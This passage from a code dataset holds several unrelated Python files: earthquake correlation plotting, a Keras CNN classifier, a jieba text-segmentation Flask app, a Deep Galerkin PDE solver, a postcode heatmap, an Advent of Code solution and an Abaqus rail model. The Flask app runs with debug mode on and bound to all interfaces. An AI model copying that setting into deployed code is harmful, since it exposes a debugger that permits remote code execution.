вложения\ndef drawCorrelationDimension(response):\n clearFolder(\n 'C:\\Учеба\\НИР\\Код\\Diploma.WebApi\\Графика на питон\\correlationDimension')\n for interval in response[\"timeIntervalCorrelationDimensions\"]:\n x = [i[\"m\"] for i in interval[\"correlationDimensions\"]]\n y = [i[\"value\"] for i in interval[\"correlationDimensions\"]]\n fig, ax = plt.subplots(nrows=1, ncols=1) # create figure & 1 axis\n ax.plot(x, y)\n # save the figure to file\n fig.savefig(\n f'C:\\Учеба\\НИР\\Код\\Diploma.WebApi\\Графика на питон\\correlationDimension\\{interval[\"minDimension\"]}---{interval[\"start\"][:10]}--{interval[\"end\"][:10]}') #\n plt.close(fig)\n\n# построение графиков корреляционных интегралов\n\n\ndef drawCorelationIntegrals(response):\n clearFolder(\n 'C:\\Учеба\\НИР\\Код\\Diploma.WebApi\\Графика на питон\\correlationIntegrals')\n for interval in response[\"timeIntervalCorrelationDimensions\"]:\n fig, ax = plt.subplots(nrows=1, ncols=1)\n ax.plot(sigmas_ln, interval[\"attractor_tmp\"])\n y = [interval[\"k_tmp\"]*x + interval[\"b_tmp\"] for x in sigmas_ln]\n ax.plot(sigmas_ln, y)\n fig.savefig(\n f'C:\\Учеба\\НИР\\Код\\Diploma.WebApi\\Графика на питон\\correlationIntegrals\\{interval[\"start\"][:10]}--{interval[\"end\"][:10]}') #\n plt.close(fig)\n\n\ndef clearFolder(path):\n files = glob.glob(path)\n for f in files:\n try:\n os.chmod(f, stat.S_IWRITE)\n os.remove(f)\n except:\n print(\"error\")\n\n# body = {\n# 'latitudeStart': 52.690478,\n# 'latitudeEnd': 60,\n# 'longtitudeStart': 155,\n# 'longtitudeEnd': 
159.525422,\n# 'intervalDays': 800,\n# 'stepDays': 300\n# }\n\n\nbody = {\n 'latitudeStart': 41.55792,\n 'latitudeEnd': 44.30813,\n 'longtitudeStart': 41.06689,\n 'longtitudeEnd': 48.7793,\n 'intervalDays': 700,\n 'stepDays': 200\n}\n\n\nsigmas = [3, 2.9, 2.8, 2.7, 2.6, 2.5, 2.4, 2.3, 2.2, 2.1, 2.0, 1.9,\n 1.8, 1.7, 1.6, 1.5, 1.4, 1.3, 1.2, 1.1]\n\nsigmas_ln = [i for i in sigmas] # [math.log(i) for i in sigmas]\n\nresponse = requests.post(\n 'http://localhost:5255/api/EarthQuakes/AnalyzeEarthQuakes', json=body).json()\ndimensions = [time_interval[\"minDimension\"]\n for time_interval in response[\"timeIntervalCorrelationDimensions\"]]\nmagnitudes = [row[\"magnitude\"] for row in response[\"timeSeriesMaxMagnitudes\"]]\n\ndrawCorrelationDimension(response)\ndrawCorelationIntegrals(response)\n\n\nprint(np.corrcoef(dimensions, magnitudes)[0, 1])\n\nfig, ax = plt.subplots()\nax.plot(list(range(len(dimensions))), dimensions,\n label='Корреляционная размерность')\nax.plot(list(range(len(magnitudes))), magnitudes, label='Магнитуда')\nplt.legend()\nplt.show()\n","repo_name":"komtriangle/Diploma_work","sub_path":"Графика на питон/main3.py","file_name":"main3.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"20343260795","text":"import pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras import layers, models\nfrom keras.regularizers import l2\nfrom matplotlib import pyplot as plt\n\nEPOCHS = 100\nBATCH_SIZE = 16\nMODEL_EPOCHS = [5, 10, 5, 10, 5, 10]\nNAMES = [\"model1\", \"model2\", \"best_model1\", \"best_model2\", \"worst_model1\", \"worst_model2\"]\nDATA_FILE_NAME = \"./train.csv\"\n\ndef load_data_from_csv(file_path):\n csv_data = pd.read_csv(file_path)\n data = np.array(csv_data)\n return data\n\ndef preprocess_data(csv_data):\n labels = np.array([row[0] for row in csv_data])\n vectors = np.array([(np.array(row[1:]) / 255).reshape(-1, 28) for row in csv_data]).reshape(-1, 28, 28, 1)\n return vectors, labels\n\ndef get_accuracy(labels, predictions):\n return len([1 for i in range(len(labels)) if np.argmax(predictions[i]) == labels[i]]) / len(labels)\n\ndef create_model(input_shape, num_classes, dropout_rate):\n model = models.Sequential([\n layers.Conv2D(filters=64, kernel_size=(3, 3), activation=\"relu\", input_shape=input_shape),\n layers.MaxPooling2D((2, 2)),\n layers.Flatten(),\n layers.Dense(64, activation=\"relu\"),\n layers.Dense(num_classes, activation=\"softmax\")\n ])\n model.compile(optimizer=\"adam\", loss=\"sparse_categorical_crossentropy\", metrics=[\"accuracy\"])\n return model\n\ndef create_worse_model(input_shape, num_classes, dropout_rate):\n model = models.Sequential([\n layers.Conv2D(filters=32, kernel_size=(5,5), activation=\"relu\", input_shape=input_shape),\n layers.MaxPooling2D((2, 2)),\n layers.Flatten(),\n layers.Dense(num_classes, activation=\"softmax\")\n ])\n model.compile(optimizer=\"adam\", loss=\"sparse_categorical_crossentropy\", metrics=[\"accuracy\"])\n return model\n\ndef build_model2(input_shape, num_classes):\n model = models.Sequential([\n layers.Conv2D(64, (3, 3), activation='relu', input_shape=input_shape, kernel_regularizer=l2(0.0001)),\n layers.MaxPooling2D((2, 2)),\n layers.Conv2D(128, (3, 3), activation='relu', padding='same'),\n layers.MaxPooling2D((2, 2)),\n layers.Conv2D(256, (3, 3), activation='relu', padding='same'),\n layers.MaxPooling2D((2, 2)),\n layers.Flatten(),\n layers.Dense(512, activation='relu'),\n 
layers.Dropout(0.5),\n layers.Dense(num_classes, activation='softmax')\n ])\n model.compile(optimizer=\"adam\", loss=\"sparse_categorical_crossentropy\", metrics=[\"accuracy\"])\n return model\n\ndef train_model(model, train_vectors, train_labels, validation_vectors, validation_labels, epochs, batch_size):\n history = model.fit(train_vectors, train_labels, epochs=epochs, batch_size=batch_size, validation_data=(validation_vectors, validation_labels))\n return history\n\ndef save_model(model, file_name):\n model.save(file_name)\n\ndef load_model(file_name):\n return tf.keras.models.load_model(file_name)\n\ndef predict_labels(model, test_vectors):\n return model.predict(test_vectors)\n\ndef plot_training(history_list, model_names):\n num_models = len(history_list)\n\n for i in range(num_models):\n history = history_list[i]\n model_name = model_names[i]\n\n plt.figure(figsize=(6, 4))\n plt.plot(np.arange(1, len(history.history['accuracy']) + 1), history.history['accuracy'], label='Training Accuracy')\n plt.plot(np.arange(1, len(history.history['val_accuracy']) + 1), history.history['val_accuracy'], label='Validation Accuracy')\n plt.title('{} Accuracy'.format(model_name))\n plt.xlabel('Epoch')\n plt.ylabel('Accuracy')\n plt.legend()\n plt.tight_layout()\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n data = load_data_from_csv(DATA_FILE_NAME)\n\n train_split = 0.7\n val_split = 0.2\n test_split = 0.1\n\n split_index_train = int(len(data) * train_split)\n split_index_val = int(len(data) * (train_split + val_split))\n\n train_data = data[:split_index_train]\n val_data = data[split_index_train:split_index_val]\n test_data = data[split_index_val:]\n\n train_vectors, train_labels = preprocess_data(train_data)\n val_vectors, val_labels = preprocess_data(val_data)\n test_vectors, test_labels = preprocess_data(test_data)\n\n\n trained_models = []\n predictions_list = []\n history_list = []\n\n for i, model_file_name in enumerate(NAMES[:-2]):\n model_epochs = MODEL_EPOCHS[i]\n model_batch_size = BATCH_SIZE * (EPOCHS // model_epochs)\n\n model = create_model(input_shape=(28, 28, 1), num_classes=10, dropout_rate=0.2*(i+1))\n history = train_model(model, train_vectors, train_labels, val_vectors, val_labels, model_epochs, model_batch_size)\n save_model(model, model_file_name)\n trained_models.append(model)\n\n model = load_model(model_file_name)\n predictions = predict_labels(model, test_vectors)\n predictions_list.append(predictions)\n\n accuracy = get_accuracy(test_labels, predictions)\n print(\"Model {}: Accuracy: {:.2f}%\".format(i+1, accuracy * 100))\n\n history_list.append(history)\n\n for i, model_file_name in enumerate(NAMES[-2:]):\n model_epochs = MODEL_EPOCHS[i]\n model_batch_size = BATCH_SIZE * (EPOCHS // model_epochs)\n\n model = build_model2(input_shape=(28, 28, 1), num_classes=10)\n history = train_model(model, train_vectors, train_labels, val_vectors, val_labels, model_epochs, model_batch_size)\n save_model(model, model_file_name)\n trained_models.append(model)\n\n model = load_model(model_file_name)\n predictions = predict_labels(model, test_vectors)\n predictions_list.append(predictions)\n\n accuracy = get_accuracy(test_labels, predictions)\n print(\"Best Model {}: Accuracy: {:.2f}%\".format(i+1, accuracy * 100))\n\n history_list.append(history)\n \n for i, model_file_name in enumerate(NAMES[-2:]):\n model_epochs = MODEL_EPOCHS[i]\n model_batch_size = BATCH_SIZE * (EPOCHS // model_epochs)\n\n model = create_worse_model(input_shape=(28, 28, 1), num_classes=10, dropout_rate=0.2*(i+1))\n 
history = train_model(model, train_vectors, train_labels, val_vectors, val_labels, model_epochs, model_batch_size)\n save_model(model, model_file_name)\n trained_models.append(model)\n\n model = load_model(model_file_name)\n predictions = predict_labels(model, test_vectors)\n predictions_list.append(predictions)\n\n accuracy = get_accuracy(test_labels, predictions)\n print(\"Best Model {}: Accuracy: {:.2f}%\".format(i+1, accuracy * 100))\n\n history_list.append(history)\n\n model_names = [\"Model 1\", \"Model 2\", \"Best Model 1\", \"Best Model 2\", \"Worst Model 1\" , \"Worst Model 2\"]\n model_names = NAMES[:len(history_list)]\n plot_training(history_list, model_names)","repo_name":"Zuba13/ori-projekat","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":6805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"71421748315","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: bryn\n\"\"\"\nfrom jieba import cut \nfrom flask import Flask, redirect, url_for, request,render_template\napp = Flask(__name__)\n\n@app.route('/success/')\ndef success(res):\n return render_template('result.html', result=res)\n\n@app.route('/text_seg',methods = ['POST', 'GET'])\ndef text_seg():\n if request.method == 'POST':\n text = request.form['text']\n text = ' | '.join(cut(text))\n return redirect(url_for('success',res = text))\n else:\n text = request.args.get('text')\n text = ' | '.join(cut(text))\n return redirect(url_for('success',res = text))\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug = True)\n","repo_name":"LinNan1/lab_final","sub_path":"code/myapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9358277230","text":"import DGM\nimport tensorflow as tf\nimport numpy as np\ntf.get_logger().setLevel('ERROR')\n\n# Model parameters\n\n# PDE domain\nt_low = 0 + 10e-15 # time lower bound\nT = 1 - 10e-15 # time upper bound\nx_low = 0.0 + 10e-15 # X lower bound\nx_high = 1 - 10e-15 # X upper bound\n\n\n# Parameters domains\nnu_low = 40.0\nnu_high = 50.0\ngamma_low = -2.0\ngamma_high = 2.0\ntheta_low = 1.0\ntheta_high = 1.0\n\n# NN parameters\nnum_layers = 3\nnodes_per_layer = 20\nlearning_rate = 0.0005\n\n# Training parameters\nsampling_stages = 100 # number of times to resample new time-space domain points\nsteps_per_sample = 100 # number of SGD steps to take before re-sampling\n\n# Sampling parameters\nnSim_interior = 2000\nnSim_terminal = 2000\n\n# Model tensor placeholders\n\n# inputs (time, space domain interior, space domain at initial time)\nt_interior_tnsr = tf.placeholder(tf.float64, [None,1])\nx_interior_tnsr = tf.placeholder(tf.float64, [None,1])\n\n#initial conditions\nt_initial_tnsr = tf.placeholder(tf.float64, [None,1])\nx_initial_tnsr = tf.placeholder(tf.float64, [None,1])\n\n#boundary conditions\nx_boundary_tnsr = tf.placeholder(tf.float64, [None,1])\nx_boundary_last_tnsr = tf.placeholder(tf.float64, [None,1])\n\n#parameters\nparam_gamma_tnsr = tf.placeholder(tf.float64, [None, 1])\nparam_theta_tnsr = tf.placeholder(tf.float64, [None, 1])\nparam_nu_tnsr = tf.placeholder(tf.float64, [None, 1])\n\n\ndef sampler(nSim_interior, nSim_terminal):\n ''' Sample time-space points from the function's domain; points are sampled\n uniformly on the interior of the domain, at the initial/terminal time points\n and along the spatial boundary at different time 
points. \n \n Args:\n nSim_interior: number of space points in the interior of the function's domain to sample \n nSim_terminal: number of space points at terminal time to sample (terminal condition)\n ''' \n \n # Sampler #1: PDE domain interior\n t_interior = np.random.uniform(low=t_low, high=T, size=[nSim_interior, 1])\n x_interior = np.random.uniform(low=x_low, high=x_high, size=[nSim_interior, 1])\n\n # Sampler #2: boundary\n x_boundary = np.ones(shape=(nSim_terminal, 1), dtype=np.float64)*(10e-50)\n x_boundary_last = np.ones(shape=(nSim_terminal, 1), dtype=np.float64)*(1-10e-50) \n\n # Sampler #3: initial condition\n t_terminal = np.zeros(shape = (nSim_terminal, 1))\n x_terminal = np.random.uniform(low=0, high=1, size = [nSim_terminal, 1])\n\n # Sampler #4: parameters interior\n gamma_interior = np.random.uniform(low=gamma_low, high=gamma_high, size=[nSim_interior, 1])\n theta_interior = np.random.uniform(low=theta_low, high=theta_high, size=[nSim_interior, 1])\n nu_interior = np.random.uniform(low=nu_low, high=nu_high, size=[nSim_interior, 1])\n\n\n return t_interior, x_interior, t_terminal, x_terminal, x_boundary, x_boundary_last, gamma_interior, theta_interior, nu_interior\n\ndef loss(model, t_interior, x_interior, \n t_terminal, x_terminal,\n x_boundary, x_boundary_last,\n param_gamma, param_theta, param_nu):\n\n # Loss term #1: PDE\n V = model(t_interior, [x_interior], [param_gamma, param_theta, param_nu])\n V_t = tf.gradients(V, t_interior)[0] #du/dt\n V_s = tf.gradients(V, x_interior)[0] #du/dx\n V_ss = tf.gradients(V_s, x_interior)[0] #d^2u/dx^2\n\n b = x_interior*(1-x_interior)/(2*param_nu)\n a = param_gamma * x_interior*(1-x_interior)\n diff_V = V_t - b * V_ss + a * V_s\n\n L1 = tf.reduce_mean(tf.square(diff_V)) \n \n # Loss term #2: boundary conditions\n boundary_target_payoff = param_nu*param_theta\n boundary_fitted_payoff = model(t_interior, [x_boundary], [param_gamma, param_theta, param_nu])\n boundary_fitted_right_payoff = model(t_interior, [x_boundary_last], [param_gamma, param_theta, param_nu])\n L2_left_boundary = tf.reduce_mean(tf.square(boundary_fitted_payoff - boundary_target_payoff))\n L2_right_boundary = tf.reduce_mean(tf.square(boundary_fitted_right_payoff)) \n L2 = L2_left_boundary + L2_right_boundary\n \n # Loss term #3: initial condition\n target_payoff = param_nu * param_theta*(1-tf.exp(-2*param_gamma*(1-x_terminal)))/(1-tf.exp(-2*param_gamma)) \n fitted_payoff = model(t_terminal, [x_terminal], [param_gamma, param_theta, param_nu])\n L3 = tf.reduce_mean( tf.square(fitted_payoff - target_payoff) )\n\n return L1, L2, L3\n\ndef build_model():\n #3 - number of parameters\n model = DGM.DGMNet(nodes_per_layer, num_layers, 1, 3)\n\n # loss \n L1_tnsr, L2_tnsr, L3_tnsr = loss(model, t_interior_tnsr, x_interior_tnsr, \n t_initial_tnsr, x_initial_tnsr, \n x_boundary_tnsr, x_boundary_last_tnsr,\n param_gamma_tnsr,\n param_theta_tnsr,\n param_nu_tnsr)\n loss_tnsr = L1_tnsr + L2_tnsr + L3_tnsr\n\n # option value function\n V = model(t_interior_tnsr, [x_interior_tnsr], [param_gamma_tnsr, param_theta_tnsr, param_nu_tnsr])\n\n # set optimizer\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss_tnsr)\n\n # initialize variables\n init_op = tf.global_variables_initializer()\n\n # open session\n sess = tf.Session()\n sess.run(init_op)\n\n return sess, loss_tnsr, optimizer\n\ndef train_model(sess, loss_tnsr, optimizer):\n # for each sampling stage\n for i in range(sampling_stages):\n \n # sample uniformly from the required regions\n t_interior, 
x_interior, t_initial, x_initial, x_boundary, x_boundary_last, param_gamma, param_theta, param_nu = sampler(nSim_interior, nSim_terminal)\n # for a given sample, take the required number of SGD steps\n for it in range(steps_per_sample):\n loss,_ = sess.run([loss_tnsr, optimizer],\n feed_dict = {t_interior_tnsr:t_interior, x_interior_tnsr:x_interior,\n t_initial_tnsr:t_initial, x_initial_tnsr:x_initial, \n x_boundary_tnsr:x_boundary, \n x_boundary_last_tnsr:x_boundary_last,\n param_gamma_tnsr: param_gamma, param_theta_tnsr: param_theta, param_nu_tnsr: param_nu})\n t_interior = None\n x_interior = None\n t_initial = None\n x_initial = None\n x_boundary = None\n x_boundary_last = None\n\n print(f\"#{i}/{sampling_stages}: loss: {loss}\")\n\n\nif __name__ == \"__main__\":\n output_file_name = 'one_pop_example'\n sess, loss_tnsr, optimizer = build_model()\n train_model(sess, loss_tnsr, optimizer)\n saver = tf.train.Saver()\n saver.save(sess, f'./trained_models/{output_file_name}')\n print(f'The model is saved in trained_models/{output_file_name}')","repo_name":"Kharlamov-Vladislav/Dadi-deep-galerkin","sub_path":"model_train.py","file_name":"model_train.py","file_ext":"py","file_size_in_byte":6861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"32859306210","text":"import json\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport matplotlib.colors as mcolors\r\nfrom PIL import Image\r\n\r\n# BUGS:\r\n# Two plots might not have comparible colors if they have different max values. Maybe set a false maximum and plot it on the graph?\r\n# Whole plot shifts posiotion on the map if it does not contain the correct western-most (and maybe also northern/southern-most) coordinate. Find what this coordinate is and always alter the input data to have a value at this position\r\n\r\n\r\nf = open('\\\\\\\\insrvr2\\\\folders$\\\\Kieran\\\\Desktop\\\\Py\\\\Geocoding\\\\final_postcodes.json', 'r')\r\nI = Image.open('\\\\\\\\insrvr2\\\\folders$\\\\Kieran\\\\Desktop\\\\Py\\\\Geocoding\\\\australia4.png')\r\nerr = open('C:\\\\Users\\\\Kieran\\\\Downloads\\\\err.txt', 'a')\r\nsrc = f.read()\r\ncodes = json.loads(src)\r\n\r\ndef transparent_cmap(cmap, N=255):\r\n \"Copy colormap and set alpha values\"\r\n\r\n mycmap = cmap\r\n mycmap._init()\r\n mycmap._lut[:,-1] = np.linspace(0, -0.5, N+4)\r\n return mycmap\r\n\r\nmycmap = transparent_cmap(plt.cm.hot)\r\n\r\ndef getCoordinate(postcode):\r\n\ttry:\r\n\t\tval = codes[str(postcode)]\r\n\t\t# x,y = -val[3]/6.4, val[4]/7.55\r\n\t\tx,y = -val[3]/6.4, val[4]/7.4\r\n\t\treturn x,y\r\n\texcept:\r\n\t\t# print('Invalid: ' + postcode)\r\n\t\terr.write(str(postcode) + '\\n')\r\n\t\treturn [0,0]\r\n\r\ndef plot(postcodes, artificialMaximum =1):\r\n\tpointSize = 2\r\n\tcoordinates = []\r\n\tfor postcode in postcodes:\r\n\t\tx, y = getCoordinate(postcode)\r\n\t\tif x == 0: \r\n\t\t\tcontinue\r\n\t\tcoordinates.append([round(x*100),round(y*100)])\r\n\tprint(coordinates[1])\r\n\t# coordinates.append([round(1000/6.4),round(10550/7.55)])\r\n\tcoordinates.append([round(1000/6.4),round(10550/7.4)])\r\n\tcoordinates = np.array(coordinates)\r\n\tmaxX = np.max(coordinates[:,0])\r\n\tmaxY = np.max(coordinates[:,1])\r\n\t# minX = np.min(coordinates[:,0])+23\r\n\t# minY = np.min(coordinates[:,1])+83\r\n\tminX = np.min(coordinates[:,0])+13\r\n\tminY = np.min(coordinates[:,1])+92\r\n\tprint(maxX)\r\n\tprint(maxY)\r\n\tdisplay = np.zeros((maxX-minX+pointSize,maxY-minY+pointSize))\r\n\tfor coordinate in 
coordinates:\r\n\t\tfor i in range(0,pointSize-1):\r\n\t\t\tfor j in range(0,pointSize-1):\r\n\t\t\t\tdisplay[coordinate[0]-minX+i,coordinate[1]-minY+j] = display[coordinate[0]-minX+i,coordinate[1]-minY+j] + 1\r\n\tdisplay[0,0] = artificialMaximum\r\n\tfig, ax = plt.subplots(1, 1)\r\n\t\r\n\tax.imshow(I)\r\n\t\r\n\tplt.imshow(display, cmap=transparent_cmap(plt.cm.hot), interpolation='none',norm=mcolors.LogNorm())\r\n\tplt.colorbar()\r\n\t\r\n\r\ndef plot2(postcodes, values):\r\n\tvalues2 = list(set(values))\r\n\tvalues2.insert(0, '')\r\n\tpointSize = 3\r\n\tcoordinates = []\r\n\tfor i in range(0, len(postcodes)-1):\r\n\t\tx, y = getCoordinate(postcodes[i])\r\n\t\tif x == 0: \r\n\t\t\tcontinue\r\n\t\tcoordinates.append([round(x*100),round(y*100), values2.index(values[i])])\r\n\tcoordinates = np.array(coordinates)\r\n\tmaxX = np.max(coordinates[:,0])\r\n\tmaxY = np.max(coordinates[:,1])\r\n\tminX = np.min(coordinates[:,0])+23\r\n\tminY = np.min(coordinates[:,1])+83\r\n\tdisplay = np.zeros((maxX-minX+pointSize,maxY-minY+pointSize))\r\n\tfor coordinate in coordinates:\r\n\t\tfor i in range(0,pointSize-1):\r\n\t\t\tfor j in range(0,pointSize-1):\r\n\t\t\t\tdisplay[coordinate[0]-minX+i,coordinate[1]-minY+j] = coordinate[2]\r\n\tfig, ax = plt.subplots(1, 1)\r\n\tax.imshow(I)\r\n\tplt.imshow(display, cmap=transparent_cmap(plt.cm.gist_rainbow), interpolation='cubic')\r\n\tcbar = plt.colorbar()\r\n\tcbar.set_ticks(list())\r\n\tfor index, label in enumerate(values2):\r\n\t\tx = 10\r\n\t\ty = (2 * index) / (2)\r\n\t\tcbar.ax.text(x, y, label)\r\n\t\r\ndef show():\r\n\tplt.show()\r\n","repo_name":"JamFactoryInc/ML","sub_path":"Py/pyodbc/heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29673555275","text":"import sys\nfrom typing import Tuple\n\n\nclass Forest:\n def __init__(self):\n self._forest = []\n self._width = 0\n\n def addRow(self, row: str):\n # could try to use 0xblah and then << as we scroll through\n if self._width == 0:\n self._width = len(row.strip()) - 1\n\n self._forest.append(\n [False if spot == '.' 
else True for spot in row.strip()])\n\n @property\n def num_rows(self) -> int:\n return len(self._forest)\n\n def hit_a_tree(self, row: int, column: int) -> bool:\n i = column % (self._width + 1)\n return self._forest[row][i]\n\n def __str__(self):\n res = f\"width: {self._width} num rows: {self.num_rows}\\n\"\n for row in self._forest:\n res += str(\"\".join([\"#\" if s else \".\" for s in row])) + \"\\n\"\n return res\n\n\ndef read_input(filename: str) -> Forest:\n with open(filename) as f:\n forest = Forest()\n for l in f:\n forest.addRow(l)\n return forest\n\n\ndef solve(forest: Forest, filename: str, slope: Tuple[int] = (3, 1)) -> int:\n col = slope[0]\n hit_count = 0\n for row in range(slope[1], forest.num_rows, slope[1]):\n if forest.hit_a_tree(row, col):\n hit_count += 1\n col += slope[0]\n return hit_count\n\n\ndef main(filename: str):\n forest = read_input(filename)\n # print(forest)\n slopes = [(1, 1), (3, 1), (5, 1), (7, 1), (1, 2)]\n res = 1\n for slope in slopes:\n num = solve(forest, filename, slope=slope)\n print(f\"{slope} hit {num}\")\n res *= num\n print(res)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1])\n","repo_name":"aaronbush/aoc-2020","sub_path":"d3/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"73382733276","text":"\"\"\"Create a basic 3d rail based on an abaqus sketch saved as a .sat file\n\n.. codeauthor:: Knut Andreas Meyer\n\"\"\"\n# Python imports\nfrom __future__ import print_function\nimport os, sys, inspect\nimport numpy as np\n\n# Abaqus imports\nfrom abaqusConstants import *\nfrom abaqus import mdb\nimport part, regionToolset\n\n# Project imports\nfrom rollover.local_paths import data_path\nfrom rollover.utils import naming_mod as names\nfrom rollover.utils import get_utils as get\nfrom rollover.utils import abaqus_python_tools as apt\nfrom rollover.utils import setup_material_mod as setup_material\nfrom rollover.three_d.utils import sketch_tools\n\ndefault_material = {'material_model': 'elastic', 'mpar': {'E': 210.e3, 'nu': 0.3}}\n\ndef create_from_param(rail_param):\n \"\"\" Call :py:func:`rollover.three_d.rail.basic.create` with arguments that are present in \n the rail_param dictionary. \n \n :param rail_param: dictionary containing input arguments to create function, required:\n \n - 'rail_profile'\n - 'rail_length'\n \n :type rail_param: dict\n \n :returns: The model database returned from create\n :rtype: Model object (Abaqus)\n \"\"\"\n \n create_param = {p: rail_param[p] for p in rail_param if p in create.__code__.co_varnames}\n \n return create(**create_param)\n \n\ndef create(rail_profile, rail_length, refine_region=None, sym_dir=None, material=default_material):\n \"\"\"Create a new model containing a simple rail geometry.\n \n The model is named 'RAIL' and the profile is created by importing the sketch rail_profile and \n extruding it by rail_length. 
Two sets, one in each end of the rail are created.\n \n :param rail_profile: Path to an Abaqus sketch profile saved as .sat file (acis)\n :type rail_profile: str\n \n :param rail_length: Length of rail to be extruded\n :type rail_length: float\n \n :param refine_region: Rectangle specifying partition with mesh refinement in contact region, \n defaults to None implying no refined region\n :type refine_region: list(list(float)), optional\n \n :param sym_dir: Vector specifying the normal direction if symmetry is used in the rail profile\n :type sym_dir: list(float) (len=3)\n \n :param material: Dictionary specifying the rail material model, containing the fields \n 'material_model' and 'mpar'. See :py:mod:`setup_material_mod` for detailed \n requirements\n :type material: dict\n \n :returns: The model database containing the rail part\n :rtype: Model (Abaqus object)\n\n \"\"\"\n if rail_profile.startswith(':/'):\n rail_profile = data_path + rail_profile[1:]\n \n rail_model = apt.create_model(names.rail_model)\n profile_sketch = sketch_tools.import_sketch(rail_model, rail_profile, name='rail_profile')\n rail_part = rail_model.Part(name=names.rail_part, dimensionality=THREE_D, type=DEFORMABLE_BODY)\n rail_part.BaseSolidExtrude(sketch=profile_sketch, depth=rail_length)\n if refine_region is not None:\n create_partition(rail_model, rail_part, refine_region)\n \n create_sets(rail_part, rail_length, refine_region, sym_dir)\n \n add_material_and_section(rail_model, rail_part, material)\n \n return rail_model\n\n\ndef create_sets(rail_part, rail_length, refine_region=None, sym_dir=None):\n \"\"\"Create (1) a set on each side of the rail with names from names.rail_side_sets, (2) the \n contact surface and set on the top of the rail with name names.rail_contact_surf and (3) a set \n on the bottom of the rail. If sym_dir is given, create a set with all faces in the yz-plane.\n \n :param rail_part: The part in which the sets will be created\n :type rail_part: Part (Abaqus object)\n \n :param rail_length: Length of the extruded rail\n :type rail_length: float\n \n :param refine_region: Rectangle specifying partition with mesh refinement in contact region, \n defaults to None implying no refined region\n :type refine_region: list(list(float)), optional\n \n :param sym_dir: Vector specifying the normal direction if symmetry is used in the rail profile\n :type sym_dir: list(float) (len=3)\n \n :returns: None\n :rtype: None\n\n \"\"\"\n for z, set_name in zip([0, rail_length], names.rail_side_sets):\n faces = get_end_faces(rail_part, zpos=z)\n rail_part.Set(name=set_name, faces=faces)\n \n if refine_region is None:\n contact_cell = rail_part.cells[0]\n else:\n partition_face, point_on_partition_face = get_partition_face(rail_part, refine_region)\n contact_cell = rail_part.cells.findAt(point_on_partition_face)\n \n create_contact_face_set(rail_part, contact_cell, exclude_dir=sym_dir)\n \n bottom_faces = get_bottom_faces(rail_part)\n rail_part.Set(name=names.rail_bottom_nodes, faces=part.FaceArray(faces=bottom_faces))\n \n if sym_dir is not None:\n rail_part.Set(name=names.rail_sym_set, \n faces=rail_part.faces.getByBoundingBox(xMin=-1.e-6, xMax=1.e-6))\n \n\ndef get_bottom_faces(rail_part):\n \"\"\"Return a list of faces that are on the bottom of the rail profile. 
These are identified by \n having their pointOn with an y-coordinate equal to the minimum of all faces and a normal \n direction [0, -1, 0]\n \n :param rail_part: The part in which the sets will be created\n :type rail_part: Part object (Abaqus)\n \n :returns: A list of faces that are located in the bottom of the rail\n :rtype: list[ Face object (Abaqus) ]\n\n \"\"\"\n TOL_YMIN = 1.e-6\n TOL_YDIR = 1.e-3\n \n ymin = np.inf\n for face in rail_part.faces:\n ymin = min(ymin, face.pointOn[0][1])\n \n bottom_faces = []\n for face in rail_part.faces:\n if face.pointOn[0][1] < ymin + TOL_YMIN:\n if face.getNormal()[1] < -1.0 + TOL_YDIR:\n bottom_faces.append(face)\n \n return bottom_faces\n \n \ndef create_contact_face_set(rail_part, contact_cell, exclude_dir=None):\n \"\"\" Create a face set and a surface for the contact region. \n \n :param rail_part: The rail part\n :type rail_part: Part object (Abaqus)\n \n :param contact_cell: The cell in the rail part that has the contact\n faces.\n :type contact_cell: Cell object (Abaqus)\n \n :param exclude_dir: Normalized vector. If not none, and a face \n normal aligns with this direction, the face is \n excluded. \n :type exclude_dir: list, np.array\n \n :returns: None\n \n \"\"\"\n \n # Get all faces on the contact cell\n contact_cell_faces = [rail_part.faces[f_ind] \n for f_ind in contact_cell.getFaces()]\n \n # Get all faces in the neighbouring cells\n neighbouring_cells = contact_cell.getAdjacentCells()\n if len(neighbouring_cells) > 0: \n neighbouring_faces = []\n for nc in neighbouring_cells:\n for f_ind in nc.getFaces():\n neighbouring_faces.append(rail_part.faces[f_ind])\n \n # Get all faces in contact_cell that are external \n # (i.e. not shared by neighbouring cells)\n external_faces = []\n for cf in contact_cell_faces:\n if cf not in neighbouring_faces:\n external_faces.append(cf)\n else:\n external_faces = contact_cell_faces\n \n # Get external faces without normal in z-direction or exclude_dir\n contact_faces = []\n exclude_vec = np.array([0,0,0] if exclude_dir is None else exclude_dir)\n for ef in external_faces:\n n_vec = ef.getNormal()\n if np.abs(n_vec[2]) < 0.99 and np.dot(np.array(n_vec), exclude_vec) < 0.99:\n contact_faces.append(ef)\n \n rail_part.Surface(name=names.rail_contact_surf, side1Faces=part.FaceArray(contact_faces))\n rail_part.Set(name=names.rail_contact_surf, faces=part.FaceArray(contact_faces))\n \n \ndef get_end_faces(rail_part, zpos):\n \"\"\"Get the all faces at the end of the rail specified by zpos\n \n :param rail_part: The part in which the sets will be created\n :type rail_part: Part (Abaqus object)\n \n :param zpos: The position of the end_faces\n :type zpos: float\n \n :returns: A FaceArray object containing all faces at zpos with 